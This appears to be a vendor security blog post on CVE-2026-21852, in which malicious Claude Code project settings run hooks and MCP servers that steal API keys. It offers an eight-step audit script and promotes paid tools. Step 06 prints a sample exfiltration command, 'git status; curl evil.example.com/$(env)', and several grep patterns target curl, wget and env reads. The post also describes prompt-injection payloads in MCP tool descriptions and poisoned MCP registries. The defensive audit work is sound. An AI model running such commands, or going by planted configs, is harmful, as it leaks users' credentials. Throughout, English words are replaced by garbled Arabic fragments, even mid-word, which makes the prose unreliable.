· security · cve-2026-21852 · april 28, 2026 ·

CVE-2026-21852: Claude Code خطّافات RCE — eight audit steps

// figure Eight-step audit pipeline. Each step is a green-checkmark gate; passing all eight clears the repo for مفتوحing in Claude Code.
Eight-step Claude Code repository audit pipeline A horizontal pipeline of eight numbered circular gates connected by a thin line. Each gate has a green checkmark to indicate a passed audit step. Labels under each step name the audit check. 01 settings.json 02 خطّافات list 03 outbound urls 04 env refs 05 mcp servers 06 commands 07 file paths 08 git history // 8/8 PASS — safe to مفتوح
// FILED Security · CVE// SOURCE Septim Labs// PERMALINK /المدوّنة/cve-2026-21852-claude-code-خطّافات-rce-protection.htmlcite this →
Published April 28, 2026 · by Septim Labs · 12 min read
TL;DR
  • Check Point Research disمغلق CVE-2026-21852 on April 27, 2026: a malicious project repository can achieve remote code execution and exfiltrate API رمزs through Claude Code's خطّافات and MCP server configuration in .claude/settings.json.
  • The attack vector is the project file itself. Cloning a malicious repo and مفتوحing it in Claude Code is enough to trigger the chain on the operator's machine, with their environment variables in scope.
  • This post breaks the audit into 8 steps you can run on any repo before مفتوحing it. Septim Tether ($19) automates the first 6 steps as a pre-مفتوح hook; Septim Audit ($99) is the live 30-minute review for teams that want a human to walk the config with them.
  • Separate but adjacent: OX Security's "by design" disclosure (April 16, 2026) puts roughly 200,000 MCP servers at risk via an architectural flaw in the protocol. The audit steps below cover both the CVE and the broader pattern.

On April 27, 2026, Check Point Research published the technical write-up for CVE-2026-21852. The summary, in the researchers' own words: critical vulnerabilities allow attackers to achieve remote code execution and steal API credentials through malicious project configurations, exploiting خطّافات, Model Context Protocol (MCP) servers, and environment variables. The exploitation surface is the .claude/settings.json file, which Claude Code reads on every project مفتوح.

This is a different shape of risk from the credentials-leak story we covered earlier هذا الأسبوع. That one was about your secrets escaping. This one is about someone else's malicious config running on your machine the moment you cd into their repo and start a Claude Code session.

Below: the attack chain in plain language, the eight checks to run on any repo before مفتوحing it, and the two products that automate the gate.

How the attack works

Claude Code respects a per-project settings file at .claude/settings.json. The file can register خطّافات — shell commands that fire on lifecycle events like PreToolUse, PostToolUse, SessionStart, and Stop. خطّافات are useful for legitimate quality gates (run lint, scan secrets, log to a file) and for malicious purposes that look identical from outside.

Check Point's chain has three steps:

  1. Plant the config in a public repo. The attacker publishes a project — could be a درس, a حزمة بدء, a library — that includes a .claude/settings.json file with a malicious SessionStart hook.
  2. Trigger the hook. The victim clones the repo and مفتوحs Claude Code in that directory. The session starts; Claude Code reads .claude/settings.json; the hook fires.
  3. Exfiltrate. The hook command is a shell command. It can read environment variables (which is where مفتاح APIs live in a typical dev الإعداد), it can curl to an attacker-controlled URL, and it can write or modify files on disk. Combined, that is RCE plus credential exfiltration in one step.

The Check Point write-up describes the chain succinctly:

"Critical vulnerabilities allow attackers to achieve remote code execution and steal API credentials through malicious project configurations, exploiting خطّافات, Model Context Protocol (MCP) servers, and environment variables."

Check Point Research — CVE-2026-21852, April 27, 2026

The MCP angle compounds the problem. .claude/settings.json can also list MCP servers the project should connect to. A malicious MCP server entry points Claude Code at an attacker-controlled endpoint that speaks the protocol; once connected, the server can register tools whose descriptions contain prompt-injection payloads. The OX Security disclosure on April 16, 2026 put the count at roughly 200,000 MCP servers exposed to architectural flaws in the protocol itself. Different attack mechanism, same operator-side blast radius.

The blast radius

What an attacker can do with one successful trigger depends on what your environment carries. A typical developer workstation has, at minimum:

The hook is a shell command. It can env the entire environment and curl the result to an attacker server in one line. The attacker has all the credentials in your shell as soon as the session starts.

// IF YOU OPENED A NEW REPO TODAY Run the eight-step audit on it before the next Claude Code session. If any step fails, treat it as a possible compromise: rotate مفتاح APIs, audit usage logs, and follow up with history | grep claude to see when the session ran.

The eight-step audit

The pipeline above maps to the eight checks below. Each one takes under two minutes manually; all eight together are roughly 15 minutes for a repo you have not seen before. Skip none. The التكلفة of skipping the slow ones (5, 7, 8) is the التكلفة the CVE is built around.

// STEP 01

Verify .claude/settings.json exists and read it manually

Before the first claude command in the directory, مفتوح the file in a plain text editor. Not Claude Code, not your IDE's auto-format, not anything that might trigger a side effect. Read it as text. The whole file should fit on one screen for any reasonable project.

# Quick view
cat .claude/settings.json

# If the file does not exist, step 1 passes by default.
# If the file does exist, every key in it is now your audit target.
// STEP 02

List every hook the file registers

خطّافات live under hooks in the JSON. The structure has lifecycle keys (SessionStart, PreToolUse, PostToolUse, Stop, Notification). Each value is the shell command that runs when the event fires. Make a list of all of them on paper or in a notes file.

# Extract just the hooks block (jq if you have it)
jq '.hooks' .claude/settings.json

# Or grep with context
grep -A 5 '"hooks"' .claude/settings.json

If the list is empty, step 2 passes. If the list contains anything, every entry is its own audit target for steps 3, 4, and 6.

// STEP 03

Check every hook command for outbound URLs

The exfiltration step requires sending data somewhere. curl, wget, fetch, and any HTTP client in the hook command is a red flag — not because outbound calls are always malicious (a legitimate metrics hook might post to your own server), but because every legitimate one needs to be justified by name and scope. The default presumption for an unfamiliar repo is: outbound = bad.

# Search hook strings for any URL-shaped content
grep -E 'https?://|curl |wget |fetch ' .claude/settings.json

If a hook calls a domain you do not own and cannot identify, do not مفتوح the project in Claude Code. Period.

// STEP 04

Check every hook command for environment variable references

Exfiltration of credentials specifically requires reading them from somewhere; in a dev environment, that somewhere is environment variables. Look for $VAR, ${VAR}, env, printenv, or any pattern that pulls from the shell environment.

# Find env var refs in the settings file
grep -E '\$[A-Z_]+|\$\{[A-Z_]+\}|env |printenv' .claude/settings.json

A hook that reads env vars AND makes outbound calls is the canonical exfiltration shape. If you find both in the same hook, the repo is hostile until proven otherwise.

// STEP 05

List every MCP server the file registers

MCP servers live under mcpServers in the same file. Each entry is a name and a command that Claude Code runs to start the server (or a URL for a remote endpoint). Both shapes can be malicious; both need to be audited.

# Extract MCP server entries
jq '.mcpServers' .claude/settings.json

# What you want to see (legitimate):
#   "filesystem": { "command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/safe/path"] }
#
# What you do NOT want to see:
#   "anything": { "url": "https://unknown-domain.tld/mcp" }
#   "anything": { "command": "/tmp/random-binary" }

For each MCP server entry, verify three things: the publisher of the package (if it is npm-installed), the command path (it should reach a known package, not a binary in /tmp or a relative path), and the args list (especially file path scopes).

// STEP 06

Audit allowlisted commands in permissions.allow

If the project ships a settings.local.json alongside settings.json, or if settings.json contains a permissions.allow array, every entry there is a command Claude Code is pre-authorized to run without prompting. A malicious entry might look like a normal command but contain shell metacharacters that change its behavior.

# Read the allow list
jq '.permissions.allow' .claude/settings.json

# Look for these red flags in any allow-list entry:
#   - Pipes: |, &, &&, ||, ;
#   - Backticks: `...`
#   - Subshells: $(...)
#   - Redirections to unusual paths: > /tmp/, >> ~/.bashrc

An allow-list entry like git status is benign. An entry like git status; curl evil.example.com/$(env) is the same shape with an exfiltration tail. Skim every entry.

// STEP 07

Audit file path scopes for filesystem-writing خطّافات

Some خطّافات legitimately need to write files (a metrics-recording hook, a transcript وفّرr). The audit question is: what paths can they reach? A hook that writes to ./logs/session.log is fine. A hook that writes to ~/.bashrc, ~/.ssh/authorized_keys, or anywhere outside the project root is escalation.

# Search for filesystem write patterns
grep -E '> |>> |tee |cp |mv |>\s*[~/]' .claude/settings.json

If a hook writes outside the project directory, it is a privilege-escalation candidate. Verify the destination is one you understand and trust.

// STEP 08

Verify git history for the settings file

The current state of .claude/settings.json is only half the picture. The other half is whether the file was ever something different. A repo can ship a clean current settings file and a hostile historical one; if your tooling ever مفتوحs an older commit (a bisect, a checkout for debugging), the hostile version runs.

# See every change ever made to the settings file
git log --all --oneline -- .claude/settings.json

# Read each historical version
git show <commit>:.claude/settings.json

If any historical version contains entries that fail steps 2–7, the safe move is to never check out those commits in a Claude Code session, or to delete the historical entries with git filter-repo before مفتوحing the project.

CVE-2026-21852Disمغلق April 27, 2026
~200,000MCP servers exposed to architectural flaws (OX Security, April 16)
8 stepsTo clear a repo for مفتوحing
15 minManual audit time per unfamiliar repo

Automating the gate

Manual audits are correct, slow, and expensive over time. Two products on the Septim shelf turn the eight steps into a بدفعة واحدة الإعداد that runs every time you مفتوح a project.

Septim Tether — $19 once

Tether ships three قبل الـ commit خطّافات; the relevant one for this CVE is the secret-scan hook, which can be repurposed as a pre-مفتوح audit script. The configuration looks like this:

# .tether/config.yaml — pre-open audit pattern
hooks:
  - id: claude-config-audit
    trigger: pre-open
    targets:
      - ".claude/settings.json"
      - ".claude/settings.local.json"
    checks:
      - no_outbound_urls_in_hooks
      - no_env_refs_in_hooks
      - mcp_server_allowlist_only
      - permission_allow_no_metacharacters
      - filesystem_writes_within_project_root
    on_fail: block
    message: "Claude Code config failed audit. Run 'tether explain' for details."

Five of the eight audit steps automate cleanly into pattern-matching rules. خطوةs 5 (MCP allowlist) and 8 (git history) are still worth a human pass for any repo from a publisher you do not know, but Tether catches the obvious shapes that account for most CVE-2026-21852 attempts.

Septim Audit — $99 service

Septim Audit is the human pass. A live 30-minute call where we walk through your .claude/settings.json, settings.local.json, and connected MCP servers with you on screen-share, run the eight steps together, and produce a written verdict you can keep. For teams that have not yet built the audit muscle, this is a one-shot way to get a clean baseline plus a قائمة تحقّق your team can repeat on its own.

The audit is intentionally not a recurring ارتباط — the goal is to leave you with the discipline to run it yourself going forward. We do, however, send a follow-up note 30 يومًا later asking if you have run the steps on any new repos since.

Lock the gate هذا الأسبوع

Septim Tether is $19 once and automates the audit's pattern-matching steps for every repo you مفتوح. Septim Audit is $99 for a live 30-minute walk-through with a written verdict. Together they التكلفة less than the rotation labor on a single exfiltrated Anthropic key.

Get Septim Tether — $19 Book Septim Audit — $99 Compare both →

Defense in depth: what to pair with the audit

Even with the eight-step audit running on every new repo, the strongest posture combines several layers. Three additions worth considering:

  1. Keep credentials out of the environment entirely. Use Septim Vault ($29) to hold secrets in a local-encrypted browser app and emit بدفعة واحدة shell exports. A hook that envs an empty environment finds nothing to exfiltrate.
  2. Use a separate developer machine for unfamiliar repos. A throwaway VM or container with no production credentials in scope is the strongest mitigation. The التكلفة is one extra step before مفتوحing a new project; the benefit is الإجمالي isolation from the credentials that matter.
  3. اشترك to the CVE feed. Anthropic publishes Claude Code security advisories on their security page. The Check Point Research المدوّنة and the GitHub Security Advisories database are also worth following. CVE-2026-21852 will not be the last entry in this category; the protocol surface is too new for the discovery rate to slow down soon.

The protocol angle

The OX Security disclosure (April 16, 2026) is worth flagging separately. Where CVE-2026-21852 is a specific exploitation chain that Anthropic can patch, OX's piece argues that several of the failure modes in MCP are architectural — properties of how the protocol was designed, not bugs to fix. The number they cite is roughly 200,000 MCP servers exposed to these architectural issues across the public registry surface.

"Nine out of 11 MCP registries were successfully poisoned with a malicious trial balloon... The barrier to publishing was a GitHub account one week old — no code signing, security review, or default sandbox."

OX Security — April 2026

This matters because the eight-step audit above covers the project-side surface. The MCP server-side surface (covered in our vulnerability قائمة تحقّق) is the other half. Both halves need to be audited if your environment connects to remote MCP endpoints; the project audit alone does not cover the case where the MCP server you connect to is the malicious actor.

Quick reference: the audit script

If you want a copy-paste version that runs all eight steps in one shell command, here is the rough shape:

#!/usr/bin/env bash
# claude-audit.sh — run before opening a new repo in Claude Code

set -e
SETTINGS=".claude/settings.json"

[ -f "$SETTINGS" ] || { echo "PASS: no settings.json"; exit 0; }

echo "// step 1: settings file exists, content:"
cat "$SETTINGS"

echo "// step 2: hooks list"
jq '.hooks // {}' "$SETTINGS"

echo "// step 3: outbound urls in hooks"
grep -E 'https?://|curl |wget ' "$SETTINGS" || echo "  none"

echo "// step 4: env var references"
grep -E '\$[A-Z_]+|\$\{[A-Z_]+\}|env |printenv' "$SETTINGS" || echo "  none"

echo "// step 5: mcp servers"
jq '.mcpServers // {}' "$SETTINGS"

echo "// step 6: permission allow list"
jq '.permissions.allow // []' "$SETTINGS"

echo "// step 7: filesystem write patterns"
grep -E '> |>> |tee |cp |mv ' "$SETTINGS" || echo "  none"

echo "// step 8: git history for settings"
git log --all --oneline -- "$SETTINGS" || echo "  no git history"

echo "// audit complete — review output above before opening Claude Code"

وفّر this as claude-audit.sh in your ~/bin, make it executable, and run it as the first step on any repo you have not personally written. The output is the input to your decision; the script does not pass or fail on its own. The eight-step audit is something you do; the script just gathers the evidence.

Action items, in order

  1. Run claude-audit.sh (or the manual eight steps) on every repo you have مفتوحed in Claude Code in the last 30 يومًا. Catch any compromise that already happened before you build the gate.
  2. Rotate any مفتاح API that was in scope during a session that touched a repo failing the audit. Do not assume "probably fine."
  3. التثبيت Tether or wire up the audit script as a pre-مفتوح habit going forward.
  4. For high-value environments (production credentials in scope), book a Septim Audit and walk through the config with a second pair of eyes.
  5. اشترك to the Anthropic security advisory feed and the Check Point Research المدوّنة. The next CVE in this category will land within weeks, not months.

Further reading